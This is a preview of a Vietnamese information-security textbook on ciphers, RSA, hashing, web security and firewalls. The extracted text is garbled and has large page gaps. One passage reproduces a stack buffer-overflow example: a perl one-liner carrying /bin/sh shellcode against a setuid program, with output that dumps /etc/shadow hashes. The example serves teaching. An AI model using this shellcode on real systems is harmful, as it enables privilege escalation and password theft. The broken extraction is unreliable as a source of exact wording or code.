Giaotrinh antoanthongtin tiengviet

147 20 0
Giaotrinh antoanthongtin tiengviet

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

-1- TRƯỜNG ĐẠI HỌC KINH TẾ KỸ THUẬT CÔNG NGHIỆP KHOA CÔNG NGHỆ THÔNG TIN BỘ MÔN KỸ THUẬT MÁY TÍNH GIÁO TRÌNH AN TỒN VÀ BẢO MẬT THƠNG TIN Hà nội 8-2010 -2- Mở đầu Gần đây, môn học “An tồn bảo mật thơng tin” đưa vào giảng dạy hầu hết Khoa Công nghệ Thông tin trường đại học cao đẳng Do ứng dụng mạng Internet ngày phát triển mở rộng, nên an tồn thơng tin mạng trở thành nhu cầu bắt buộc cho hệ thống ứng dụng Để đáp ứng yêu cầu học tập tự tìm hiểu sinh viên chuyên ngành Công nghệ Thông tin, Bộ môn Khoa học máy tính, Khoa Cơng nghệ Thơng tin tổ chức biên soạn giáo trình Nội dung dựa số tài liệu, chủ yếu sách Giáo sư William Stallings “Cryptography and Network Security: Principles and Practice” Cuốn sách dùng làm tài liệu giảng dạy nhiều trường đại học Đồng thời giáo trình hồn thiện bước dựa giảng tác giả cho khóa sinh viên Khoa Công nghệ Thông tin vừa qua Với mục đích trang bị kiến thức sở vừa đủ giúp cho sinh viên hiểu chất khía cạnh an ninh mạng, giáo trình tác giả cố gắng trình bày tóm tắt phần lý thuyết đưa ứng dụng thực tế Giáo trình gồm chương Chương đầu nêu tổng quan bảo mật, chương tóm tắt sơ lược mã cổ điển, chương trình bày khái niệm trường số học, chương giới thiệu mã khối chuẩn mã liệu, chương nêu mã công khai RSA, chương đưa khái niệm xác thực hàm băm, chương giới thiệu ứng dụng an tồn Web IP cuối chương tóm tắt kẻ xâm nhập biện pháp phòng chống tường lửa Do lần đầu biên soạn chưa có nhiều kinh nghiệm thực tế, nên khơng tránh khỏi sai sót lỗi in ấn định Tác giả xin vui lòng tiếp nhận đóng góp giúp cho giáo trình “An tồn bảo mật thơng tin” ngày tốt -3MỤC LỤC MỞ ĐẦU .2 CHƯƠNG I TỔNG QUAN VỀ BẢO MẬT I.1 Giới thiệu chung bảo mật thông tin I.2 Dịch vụ, chế, công I.3 Mơ hình an tồn mạng .8 I.4 Bảo mật thông tin hệ sở liệu 10 CHƯƠNG II Mà CỔ ĐIỂN .14 II.1 Mã đối xứng 14 II.2 Các mã cổ điển thay 17 II.3 Các mã cổ điển hoán vị 103 II.4 Các vấn đề khác .103 CHƯƠNG III TRƯỜNG SỐ HỌC .27 III.1 Các cấu trúc đại số 27 III.2 Các phép toán Modulo .28 III.3 Trường Galoa 31 III.4 Giới thiệu lý thuyết số 36 CHƯƠNG IV Mà KHỐI VÀ CHUÂN Mà DỮ LIỆU 43 IV.1 Mã khối đại 43 IV.2 Chuẩn mã liệu DES .45 IV.3 Chuẩn mã nâng cao AES 55 IV.4 Các mã đối xứng đương thời 62 IV.5 Bảo mật dùng mã đối xứng .67 CHƯƠNG V KHỐ CƠNG KHAI VÀ RSA 71 V.1 Mã công khai 71 V.2 RSA 73 V.3 Quản lý khoá 77 V.4 Phân phối khoá Diffie-Helman 80 V.5 Mã đường cong Elip 81 CHƯƠNG VI XÁC THỰC MẨU TIN VÀ CÁC HÀM HASH 86 -4VI.1 Xác thực mẩu tin .86 VI.2 Các hàm HASH .88 VI.3 Các thuật toán HASH MAC 90 VI.4 Các ứng dụng xác thực 100 CHƯƠNG VII AN TOÀN IP VÀ WEB 106 VII.1 An toàn IP 106 VII.2 An toàn Web 108 VII.3 Thanh tốn điện tử an tồn 112 VII.4 An toàn thư điện tử .115 CHƯƠNG VIII KẺ XÂM NHẬP VÀ BỨC TƯỜNG LỬA 120 VIII.1 Kẻ xâm nhập 120 VIII.2 Phần mềm có hại .123 VIII.3 Tràn đệm 128 VIII.4 Bức tường lửa 134 DANH MỤC CÁC KÝ HIỆU, CÁC CHỮ VIẾT TẮT 142 Phụ lục 145 -5CHƯƠNG I TỔNG QUAN VỀ BẢO MẬT I.1 Giới thiệu chung bảo mật thông tin I.1.1 Mở đầu bảo mật thông tin Ngày với phát triển bùng nổ công nghệ thông tin, hầu hết thông tin doanh nghiệp chiến lược kinh doanh, thông tin khách hàng, nhà cung cấp, tài chính, mức lương nhân viên,…đều lưu trữ hệ thống máy tính Cùng với phát triển doanh nghiệp đòi hỏi ngày cao mơi trường kinh doanh yêu cầu doanh nghiệp cần phải chia sẻ thơng tin cho nhiều đối tượng khác qua Internet hay Intranet Việc mát, rò rỉ thơng tin ảnh hưởng nghiêm trọng đến tài chính, danh tiếng cơng ty quan hệ với khách hàng Các phương thức công thông qua mạng ngày tinh vi, phức tạp dẫn đến mát thơng tin, chí làm sụp đổ hồn tồn hệ thống thơng tin doanh nghiệp Vì an tồn bảo mật thơng tin nhiệm vụ nặng nề khó đốn trước được, lại gồm ba hướng sau: - Bảo đảm an tồn thơng tin máy chủ - Bảo đảm an tồn cho phía máy trạm - Bảo mật thông tin đường truyền Đứng trước yêu cầu bảo mật thơng tin, ngồi việc xây dựng phương thức bảo mật thơng tin người ta đưa nguyên tắc bảo vệ liệu sau: - Nguyên tắc hợp pháp lúc thu thập xử lý liệu - Nguyên tắc đắn - Nguyên tắc phù hợp với mục đích - Nguyên tắc cân xứng - Nguyên tắc minh bạch - Nguyên tắc định cho cá nhân bảo đảm quyền truy cập cho người có liên quan - Nguyên tắc không phân biệt đối xử - Nguyên tắc an tồn - Ngun tắc có trách niệm trước pháp luật - Nguyên tắc giám sát độc lập hình phạt theo pháp luật - Nguyên tắc mức bảo vệ tương ứng vận chuyển liệu xuyên biên giới Ở tập trung xem xét nhu cầu an ninh đề biện pháp an toàn vận hành chế để đạt mục tiêu Nhu cầu an tồn thơng tin: • An tồn thơng tin thay đổi nhiều thời gian gần Trước có nhu cầu bảo mật thơng tin, đòi hỏi thêm nhiều yêu cầu an ninh máy chủ mạng • Các phương pháp truyền thống cung cấp chế hành phương tiện vật lý nơi lưu trữ bảo vệ tài liệu quan trọng cung cấp giấy phép quyền sử dụng tài liệu mật -6• • Máy tính đòi hỏi phương pháp tự động để bảo vệ tệp thông tin lưu trữ Nhu cầu bảo mật lớn đa dạng, có mặt khắp nơi, lúc Do khơng thể khơng đề qui trình tự động hỗ trợ bảo đảm an tồn thơng tin Việc sử dụng mạng truyền thơng đòi hỏi phải có phương tiện bảo vệ liệu truyền Trong có phương tiện phần mềm phần cứng, đòi hỏi có nghiên cứu đáp ứng toán thực tiễn đặt Các khái niệm: • An tồn máy tính: tập hợp công cụ thiết kế để bảo vệ liệu chống hacker • An tồn mạng: phương tiện bảo vệ liệu truyền chúng • An tồn Internet: phương tiện bảo vệ liệu truyền chúng tập mạng liên kết với Mục đích mơn học tập trung vào an tồn Internet gồm phương tiện để bảo vệ, chống, phát hiện, hiệu chỉnh phá hoại an toàn truyền lưu trữ thông tin I.1.2 Nguy hiểm họa hệ thống thông tin Các hiểm họa hệ thống phân loại thành hiểm họa vơ tình hay cố ý, chủ động hay thụ động - Hiểm họa vơ tình: người dùng khởi động lại hệ thống chế độ đặc quyền, họ tùy ý chỉnh sửa hệ thống Nhưng sau hồn thành cơng việc họ khơng chuyển hệ thống sang chế độ thơng thường, vơ tình để kẻ xấu lợi dụng - Hiểm họa cố ý: cố tình truy nhập hệ thống trái phép - Hiểm họa thụ động: hiểm họa chưa không tác động trực tiếp lên hệ thống, nghe trộm gói tin đường truyền - Hiểm họa chủ động: việc sửa đổi thơng tin, thay đổi tình trạng hoạt động hệ thống Đối với hệ thống thông tin mối đe dọa hậu tiềm ẩn lớn, xuất phát từ nguyên nhân sau: - Từ phía người sử dụng: xâm nhập bất hợp pháp, ăn cắp tài sản có giá trị - Trong kiến trúc hệ thống thơng tin: tổ chức hệ thống kỹ thuật khơng có cấu trúc không đủ mạnh để bảo vệ thông tin - Ngay sách bảo mật an tồn thơng tin: khơng chấp hành chuẩn an tồn, khơng xác định rõ quyền vận hành hệ thống - Thơng tin hệ thống máy tính dễ bị xâm nhập khơng có cơng cụ quản lý, kiểm tra điều khiển hệ thống - Nguy nằm cấu trúc phần cứng thiết bị tin học phần mềm hệ thống ứng dụng hãng sản xuất cài sẵn loại 'rệp' điện tử theo ý đồ định trước, gọi 'bom điện tử' - Nguy hiểm mạng máy tính mở tin tặc, từ phía bọn tội phạm I.1.3 Phân loại công phá hoại an tồn: -7- Các hệ thống mạng đối tượng nhiều kiểu công: - Tấn công giả mạo thực thể công giả danh thực thể khác Tấn công giả mạo thường kết hợp với dạng công khác công chuyển tiếp công sửa đổi thông báo - Tấn công chuyển tiếp xảy thông báo, phần thông báo gửi nhiều lần, gây tác động tiêu cực - Tấn công sửa đổi thông báo xảy nội dung thông báo bị sửa đổi không bị phát - Tấn công từ chối dịch vụ xảy thực thể không thực chức mình, gây cản trở cho thực thể khác thực chức chúng - Tấn công từ bên hệ thống xảy người dùng hợp pháp cố tình vơ ý can thiệp hệ thống trái phép Còn cơng từ bên ngồi nghe trộm, thu chặn, giả mạo người dùng hợp pháp vượt quyền lách qua chế kiểm soát truy nhập • Tấn cơng bị động Do thám, theo dõi đường truyền để: o nhận nội dung tin o theo dõi luồng truyền tin • Tấn cơng chủ động Thay đổi luồng liệu để: o giả mạo người o lặp lại tin trước o thay đổi ban tin truyền o từ chối dịch vụ I.2 Dịch vụ, chế, công Nhu cầu thực tiến dẫn đến cần thiết có phương pháp hệ thống xác định yêu cầu an ninh tổ chức Trong cần có tiếp cận tổng thể xét ba khía cạnh an tồn thơng tin: bảo vệ cơng, chế an toàn dịch vụ an toàn Sau xét chúng theo trình tự ngược lại: -8I.2.1 Các dịch vụ an tồn Đây cơng cụ đảm bảo an tồn hệ thống xử lý thơng tin truyền thông tin tổ chức Chúng thiết lập để chống lại cơng phá hoại Có thể dùng hay nhiều chế an toàn để cung cấp dịch vụ Thông thường người ta cần phải tạo liên kết với tài liệu vật lý: có chữ ký, ngày tháng, bảo vệ cần thiết chống khám phá, sửa bậy, phá hoại, công chứng, chứng kiến, ghi nhận có quyền I.2.2 Các chế an tồn: Từ cơng việc thực tế để chống lại phá hoại an ninh, người ta hệ thống xếp lại tạo thành chế an ninh khác Đây chế thiết kế để phát hiện, bảo vệ khôi phục cơng phá hoại Khơng có chế đơn lẻ đáp ứng chức yêu cầu cơng tác an ninh Tuy nhiên có thành phần đặc biệt nằm chế an tồn là: kỹ thuật mã hố Do dành thời lượng định tập trung vào lý thuyết mã I.2.3 Tấn công phá hoại an ninh: Ta xác định rõ hành động cơng phá họai an ninh Đó hành động chống lại an tồn thơng tin tổ chức An tồn thơng tin bàn cách chống lại công vào hệ thống thông tin phát chúng Trên thực tế có nhiều cách nhiều kiểu cơng khác Thường thuật ngữ đe doạ công dùng Cần tập trung chống số kiểu cơng chính: thụ động chủ động I.3 Mơ hình an tồn mạng I.3.1 Kiến trúc an tồn hệ thống truyền thông mở OSI Để giúp cho việc hoạch định sách xây dựng hệ thống an ninh tốt Bộ phận chuẩn hóa tiêu chuẩn tổ chức truyền thông quốc tế (International Telecommunication -9Union) nghiên cứu đề Kiến trúc an ninh X800 dành cho hệ thống trao đổi thông tin mở OSI Trong định nghĩa cách hệ thống phương pháp xác định cung cấp u cầu an tồn.Nó cung cấp cho cách nhìn tổng quát, hữu ích khái niệm mà nghiên cứu Trước hết nói dich vụ an tồn, X800 định nghĩa dịch vụ cung cấp cho tầng giao thức hệ thống mở trao đổi thông tin, mà đảm bảo an tồn thơng tin cần thiết cho hệ thống cho việc truyền liệu Trong tài liệu thuật ngữ chuẩn Internet RFC 2828 nêu định nghĩa cụ thể dich vụ an toàn dịch vụ trao đổi xử lý cung cấp cho hệ thống việc bảo vệ đặc biệt cho thông tin nguồn.Tài liệu X800 đưa định nghĩa dịch vụ theo loại chính: - Xác thực: tin tưởng thực thể trao đổi tuyên bố Người trao đổi xưng tên với anh ta, không cho phép người khác mạo danh - Quyền truy cập: ngăn cấm việc sử dụng nguồn thơng tin khơng vai trò Mỗi đối tượng hệ thống cung cấp quyền hạn định hành động khuôn khổ quyền hạn - Bảo mật liệu: bảo vệ liệu khơng bị khám phá người khơng có quyền Chẳng hạn dùng ký hiệu khác để thay ký hiệu tin, mà người có quyền khơi phục ngun - Tồn vẹn liệu: tin tưởng liệu gửi từ người có quyền Nếu có thay đổi làm trì hỗn mặt thời gian hay sửa đổi thơng tin, xác thực cho cách kiểm tra nhận biết có tượng xảy - Khơng từ chối: chống lại việc chối bỏ bên tham gia trao đổi Người gửi khơng trối bỏ gửi thông tin với nội dung người nhận khơng thể nói dối tơi chưa nhận thơng tin Điều cần thiết việc trao đổi, thỏa thuận thông tin hàng ngày Cơ chế an toàn định nghĩa X800 sau: - Cơ chế an toàn chuyên dụng cài đặt giao thức tầng vận chuyển đó: mã hố, chữ ký điện tử, quyền truy cập, tồn vẹn liệu, trao đổi có phép, đệm truyền, kiểm sốt định hướng, cơng chứng - Cơ chế an tồn phổ dụng khơng rõ dùng cho giao thức tầng dịch vụ an ninh cụ thể nào: chức tin cậy cho tiêu chuẩn đó, nhãn an tồn chứng tỏ đối tượng có tính chất định, phát kiện, vết theo dõi an tồn, khơi phục an tồn I.3.2 Mơ hình an tồn mạng tổng qt Sử dụng mơ hình đòi hỏi phải thiết kế: o thuật tốn phù hợp cho việc truyền an tồn o Phát sinh thơng tin mật (khố) sử dụng thuật toán o Phát triển phương pháp phân phối chia sẻ thông tin mật o đặc tả giao thức cho bên để sử dụng việc truyền thông tin mật cho dịch vụ an tồn Mơ hình truy cập mạng an tồn: - 10 - Sử dụng mơ hình đòi hỏi phải: o Lựa chọn hàm canh cổng phù hợp cho người sử dụng có danh tính o Cài đặt kiểm sốt quyền truy cập để tin tưởng có người có quyền truy cập thơng tin đích nguồn o Các hệ thống máy tính tin cậy dùng mơ hình I.4 Bảo mật thơng tin hệ sở liệu I.4.1 Giới thiệu chung Các hệ sở liệu (CSDL) ngày Oracle, SQL/Server, DB2/Informix có sẵn cơng cụ bảo vệ tiêu chuẩn hệ thống định danh kiểm soát truy xuất Tuy nhiên, biện pháp bảo vệ khơng có tác dụng trước công từ bên Để bảo vệ thông tin khỏi mối đe dọa này, người ta đưa hai giải pháp Giải pháp đơn giản bảo vệ liệu CSDL mức độ tập tin, chống lại truy cập trái phép vào tập tin CSDL hình thức mã hóa Tuy nhiên, giải pháp không cung cấp mức độ bảo mật truy cập đến CSDL mức độ bảng, cột dòng Một điểm yếu giải pháp với quyền truy xuất CSDL truy - 133 - Example Stack Overflow Attack $ dir -l buffer4 -rwsr-xr-x root knoppix 16571 Jul 17 10:49 buffer4 $ whoami knoppix $ cat /etc/shadow cat: /etc/shadow: Permission denied $ cat attack1 perl -e 'print pack("H*", "90909090909090909090909090909090 " "90909090909090909090909090909090 " "9090eb1a5e31c08846078d1e895e0889 " "460cb00b89f38d4e088d560ccd80e8e1 " "ffffff2f62696e2f7368202020202020" "202020202020202038fcffbfc0fbffbf0a"); print "whoami\n"; print "cat /etc/shadow\n";' $ attack1 | buffer4 Enter value for name: Hello youryyy)DA0Apy is e?^1AFF /bin/sh root root:$1$rNLId4rX$nka7JlxH7.4UJT4l9JRLk1:13346:0:99999:7::: daemon:*:11453:0:99999:7::: nobody:*:11453:0:99999:7::: knoppix:$1$FvZSBKBu$EdSFvuuJdKaCH8Y0IdnAv/:13346:0:99999:7::: Phát triển code che đậy Trong ví dụ mơ tả với Intel Linux shellcode để chạy dịch Bourne shell Shellcode cần phải phù hợp với đối số cho execve() Nó bao gồm code để gọi hàm hệ thống, phải độc lập với vị trí khơng chứa NULLs – xâu kết thúc C Thông thường chương trình che đậy vỏ bọc tiện ích hệ thống đáng tin cậy, dịch vụ mạng đặc biệt, code thư viện sử dụng chung, hình ảnh Các hàm shellcode: giao diện tự sinh, tạo đối tượng nghe để khởi tạo giao diện kết nối, tạo kết nối ngược lại tới kẻ công, vượt qua qui tắc tường lửa, khỏi mơi trường thực thi hạn chế VIII.3.4 Bảo vệ tràn nhớ Tràn đệm khai thác rộng rãi, có nhiều code có lỗ hổng dùng Mặc dù nguyên nhân biện pháp chống biết Có hai cách chống rộng rãi: chương trình gia cố thời gian dịch kiểm sốt cơng chương trình có thời gian chạy Nếu sử dụng ngôn ngữ bậc cao với kiểu mạnh , khơng có lỗ hổng tràn đệm Chương trình dịch buộc kiểm tra cỡ thao tác cho phép biến Khi phải trả giá sử dụng nguồn hạn chế truy cập đến phần cứng Tuy nhiên cần số code ngôn ngữ giống C Bảo vệ thời gian dịch Thiết lập kỹ thuật lập trình an tồn Nếu sử dụng ngơn ngữ tiềm ẩn khơng an tồn C, lập trình viên cần viết code an toàn cách tường minh Bằng thiết kế với code - 134 mới, sau xem xét code cũ Xem an toàn tràn đệm tập kỹ thuật lập trình an tồn nói chung Chú ý đến lỗi nhỏ, kiểm tra đủ khơng gian đệm Có đề nghị mở rộng an toàn cho C tạo điểm phạt thực thi, cần dịch chương trình với chương trình dịch đặc biệt Có số phương án thư viện chuẩn an toàn, hàm mới, strlcpy() Cài đặt lại an toàn số hàm chuẩn thư viện động, chẳng hạn Libsafe Bổ sung code chức nhập thoát để kiểm tra ngăn xếp ghi nhận việc ghi đè, sử dụng yếu tố ngẫu nhiên bảo vệ ngăn xếp, kiểm tra viết đè biến cục trỏ khung lưu trữ địa trả Chương trình dừng phát thay đổi Phát hành: dịch lại, hỗ trợ phát lỗi copy an toàn lưu trữ/kiểm tra địa trả Bảo vệ thời gian chạy Sử dụng hỗ trợ nhớ ảo để tạo số vùng nhớ không thực thi stack, heap, global data Cần hỗ trợ từ phần cứng nhớ SPARC / Solaris systems, x86 Linux/Unix/Windows systems Phát hành hỗ trợ cho code ngăn xếp thực thi, cần số dự phòng đặc biệt Thao tác vị trí cấu trúc liệu chính, sử dụng tịnh tiến ngẫu nhiên cho tiến trình, có vùng địa lớn phương tiện hệ thống đại chống va chạm đoán địa đệm đích khơng thể Vị trí ngẫu nhiên cho đệm heap vị trí hàm thư viện chuẩn Đặt trang bảo vệ vùng quan trọng nhớ, đặt cờ nhớ địa khơng hợp lệ Có thể đặt khung ngăn xếp đệm heap thời gian thực thi phải trả giá khơng gian Có nhiều phương án công khác: phương án tràn ngăn xếp, tràn heap, tràn liệu tổng thể, tràn xâu định dạng, tràn số nguyên Có thể có nhiều phát tương lai Một số ngăn chặn trừ code an toàn lúc ban đầu Phương án tràn ngăn xếp viết đè đệm trỏ khung lưu trữ trả xảy đến khung giả trả lời gọi hàm điều khiển kẻ cơng dùng có tràn đệm giới hạn Ví dụ tách khung Tuy có hạn chế: cần biết địa xác đệm, hàm gọi thực với khung giả, phương án tràn ngăn xếp thay địa trả hàm thư viện chuẩn để đáp lại bảo vệ ngăn xếp không thực thi Kẻ công xây dựng tham số phù hợp ngăn xếp phía địa chi trả Kẻ cơng cần địa xác đệm, kết nối hai lời gọi thư viện Cũng có công đệm đặt heap Thông thường đặt code chương trình, nhớ yêu cầu chương trình để sử dụng cho cấu trúc liệu động, ví dụ danh sách móc nối Khơng có địa trả về, nên khơng có chuyển giao quyền điều khiển dễ dàng Có thể có trỏ hàm để khai thác thao tác cấu trúc liệu quản trị Cách bảo vệ dùng heap ngẫu nhiên khơng thực thi Có thể cơng đệm đặt liệu tổng thể Có thể đặt phía code chương trình Nếu có trỏ hàm đệm có lỗ hổng bảng quản trị trình liền kề Nhắm tới viết đè trỏ hàm gọi sau Cách bảo vệ dùng vùng liệu tổng thể ngẫu nhiên không thực thi, dịch chuyển trỏ hàm, trang bảo vệ - 135 VIII.4 Bức tường lửa VIII.4.1 Mở đầu Bức tường lửa phát triển mạnh mẽ, ứng dụng các hệ thống thông tin Bây người muốn lên Internet mạng liên kết với Vì cần quan tâm thường xun an tồn Khơng dễ dàng bảo vệ hệ thống tổ chức Thông thường sử dụng tường lửa, cung cấp vòng bảo vệ phần chiến lược an toàn toàn diện Bức tường lửa Là điểm cổ chai để kiểm sốt theo dõi Các mạng liên kết với độ tin cậy khác nhau, buộc có hạn chế dịch vụ mạng Chẳng hạn, vận chuyển phải có giấy phép Kiểm tra kiểm sốt truy cập, cài đặt cảnh báo hành vi bất thường Cung cấp bảng NAT sử dụng theo dõi giám sát Cài đặt mạng riêng ảo (VPN) sử dụng chế an tồn IPSec Có thể miễn dịch trước Hạn chế tường lửa Không bảo vệ cơng vòng qua nó, chẳng hạn mạng lút, thiết bị modems Nó ngăn cản tổ chức tin cậy dịch vụ tin cậy (SSL/SSH) Không bảo vệ chống mối đe dọa từ bên trong, chẳng hạn nhân viên bực tức thông đồng với kẻ xấu Không thể bảo vệ chống việc truyền chương trình file nhiễm virus, có phạm vi rộng dạng file hệ điều hành VIII.4.2 Bức tường lửa – lọc gói Là thành phần tường lửa nhanh đơn giản nhất, sở hệ thống tường lửa Nó kiểm tra gói IP (khơng có ngữ cảnh) cho phép hay từ chối tuỳ theo qui tắc xác định Suy có hạn chế truy cập đến dịch vụ cổng Các đường lối mặc định o Rằng khơng cho phép tức cấm o Rằng không cấm tức cho phép - 136 - Tấn cơng lọc gói Địa IP lừa đảo: giả địa nguồn làm cho tin tưởng, bổ sung lọc lên mạch chuyển để ngăn chặn Tấn công mạch truyền gốc: kẻ công đặt truyền khác với mặc định, ngăn chặn gói truyền gốc Tấn công đoạn tin (fragment) nhỏ Chia thông tin phần đầu thành số đoạn nhỏ Hoặc bỏ qua xếp lại trước kiểm tra Bức tường lửa – lọc gói trạng thái Lọc gói truyền thống khơng kiểm tra ngữ cảnh tầng cao hơn, tức sánh gói với dòng chảy Lọc gói trạng thái hướng đến yêu cầu Chúng kiểm tra gói IP ngữ cảnh: giữ vết theo dõi với kỳ client-server, kiểm tra gói thuộc vào phiên Suy có khả tốt phát gói giả tách khỏi ngữ cảnh VIII.4.3 Bức tường lửa – cổng giao tiếp tầng ứng dụng (hoặc proxy) Có cổng giao tiếp chuyên dùng cho ứng dụng – proxy (người uỷ quyền) Có truy cập đầy đủ đến giao thức o Người sử dụng yêu cầu dịch vụ từ proxy o Proxy kiểm tra yêu cầu có hợp lệ khơng o Sau xử lý u cầu trả lời cho người sử dụng o Có thể vào/theo dõi vận chuyển tầng ứng dụng Cần proxies khác cho dịch vụ o Một số dịch vụ hỗ trợ cách tự nhiên proxy o Những loại khác cần giải số vấn đề - 137 - VIII.4.4 Bức tường lửa - cổng giao tiếp mức mạch vòng Chuyển tiếp kết nối TCP Có an toàn cách hạn chế mà kết nối cho phép Mỗi lần tạo chuyển tiếp thông thường không kiểm tra nội dung Thông thường sử dụng tin cậy người sử dụng bên cách cho phép kết nối ngồi nói chung Gói SOCKS sử dụng rộng rãi cho mục đích VIII.4.5 Máy chủ Bastion Hệ thống máy chủ an toàn cao Chạy cổng giao tiếp mức ứng dụng mạch vòng Hoặc cung cấp dịch vụ truy cập bên ngồi Có tiềm thể yếu tố máy chủ Vì an tồn bền vững, nên hệ điều hành nặng nề hơn, dịch vụ chính, bổ sung xác thực, proxies nhỏ, an toàn, độc lập, khơng đặc quyền Có thể hỗ trợ hay nhiều kết nối mạng tin cậy để ép buộc sách tách bạch tin cậy kết nối mạng Cấu hình tường lửa (Firewall Configurations) - 138 - VIII.4.6 Kiểm soát truy cập Hệ thống xác định định danh người sử dụng, xác định nguồn gốc truy cập Mơ hình tổng qt ma trận truy cập với o Chủ thể - thực thể chủ động (người sử dụng, trình) o Đối tượng - thực thể bị động (file nguồn) o Quyền truy cập – cách mà đối tượng truy cập Có thể phân tách o Các cột danh sách kiểm soát truy cập o Các hàng thẻ khả Ma trận kiểm soát quyền truy cập - 139 - VIII.4.7 Các hệ thống máy tính tin cậy An tồn thơng tin ngày quan trọng Có mức độ khác nhạy cảm thông tin o Phân loại thông tin quân sự: bảo mật, bí mật Chủ thể (người chương trình) có nhiều quyền khác truy cập đến đối tượng thơng tin Được biết an tồn nhiều tầng o Chủ thể có mức độ an tồn tối đa o Đối tượng có phân loại mức độ tin cậy cố định Muốn xem xét cách tăng độ tin tưởng hệ thống để củng cố quyền VIII.4.8 Mơ hình Bell LaPadula Một mơ hình an tồn tiếng Được cài đặt sách bắt buộc hệ thống Có hai sách o Khơng đọc lên (tính chất an tồn đơn giản) ƒ Chủ thể đọc/viết đối tượng mức độ an toàn chủ thể trội (>=) phân loại đối tượng o Khơng viết xuống (tính chất *) ƒ Chủ thể bổ sung/viết lên đối tượng mức độ an toàn chủ thể trội (

Ngày đăng: 20/09/2019, 20:43

Mục lục

  • TRƯỜNG ĐẠI HỌC KINH TẾ KỸ THUẬT CÔNG NGHIỆP KHOA CÔNG NGHỆ T

  • GIÁO TRÌNH

  • AN TOÀN VÀ BẢO MẬT THÔNG TIN

  • Hà nội 8-2010

  • Mở đầu

  • Gần đây, môn học “An toàn và bảo mật thông tin” đã được đưa

  • Do lần đầu biên soạn và chưa có nhiều kinh nghiệm thực tế, n

  • CHƯƠNG I

  • TỔNG QUAN VỀ BẢO MẬT

  • I.1 Giới thiệu chung về bảo mật thông tin

    • I.1.1 Mở đầu về bảo mật thông tin

    • I.1.2 Nguy cơ và hiểm họa đối với hệ thống thông tin

    • I.1.3 Phân loại tấn công phá hoại an toàn:

    • I.2 Dịch vụ, cơ chế, tấn công.

    • I.2.1 Các dịch vụ an toàn.

    • I.2.2 Các cơ chế an toàn:

    • I.3 Mô hình an toàn mạng

      • I.3.1 Kiến trúc an toàn của hệ thống truyền thông mở OSI.

      • I.3.2 Mô hình an toàn mạng tổng quát

      • I.4 Bảo mật thông tin trong hệ cơ sở dữ liệu

        • I.4.1 Giới thiệu chung

        • I.4.2 Một số mô hình bảo mật cơ sở dữ liệu

        • Xây dựng tầng CSDL trung gian:

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan